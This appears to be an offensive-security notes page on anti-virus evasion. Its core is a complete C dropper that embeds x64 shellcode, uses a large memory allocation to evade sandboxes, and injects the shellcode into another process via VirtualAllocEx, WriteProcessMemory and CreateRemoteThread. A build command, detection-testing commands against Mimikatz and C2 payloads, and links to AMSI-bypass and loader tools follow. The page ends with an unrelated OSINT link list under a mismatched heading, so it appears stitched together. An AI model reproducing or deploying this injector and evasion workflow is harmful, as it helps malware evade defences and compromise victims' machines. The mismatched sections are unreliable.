Why it matters in practice
Anti-Virus Evasion Basics matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps anti-virus evasion basics tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through anti-virus evasion basics.
- Phantom evasion
- Veil-evasion
- Shellter
- Av bypass with unicorn.py
- Unicorn github
- Bypass AV through custom source code
- AV evasion with the prometheus.cpp shell workflow
- Av evasion quick reference
- Prometheus.cpp
- Windows powershell macro code
Selected public references
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
int main(int argc, char* argv[]) {
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
HANDLE ph; // process handle
HANDLE rt; // remote thread
PVOID rb; // remote buffer
DWORD pid; // process ID
pid = atoi(argv[1]);
// allocate and fill 100 MB of memory
char *mem = NULL;
mem = (char *) malloc(100000000);
if (mem != NULL) {
memset(mem, 00, 100000000);
free(mem);
// parse process ID
ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));
printf("PID: %i", pid);
// allocate memory buffer for remote process
rb = VirtualAllocEx(ph, NULL, sizeof(payload), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// "copy" data between processes
WriteProcessMemory(ph, rb, payload, sizeof(payload), NULL);
// our process start new thread
rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL);
CloseHandle(ph);
return 0;
}
}build: x86_64-w64-mingw32-g++ dropper.cpp -o dropper.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
DefenderCheck.exe PowerUp.ps1
AmsiTrigger_x64.exe -i Invoke-Mimikatz.ps1
ThreatCheck.exe -f Downloads\Grunt.bin -e AMSI
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell https://github.com/samratashok/nishang https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-Shellcode.ps1 https://powersploit.readthedocs.io/en/latest/ https://github.com/danielbohannon/Invoke-Obfuscation https://amsi.fail https://github.com/TheWover/donut https://github.com/Flangvik/DLLSideloader https://github.com/Flangvik/NetLoader
Selected public references
- OSINT Frameworkosintframework.com/
- Maltego · Downloadsmaltego.com/downloads/
- GitHub · laramies / theHarvestergithub.com/laramies/theHarvester
- GitHub · smicallef / SpiderFootgithub.com/smicallef/spiderfoot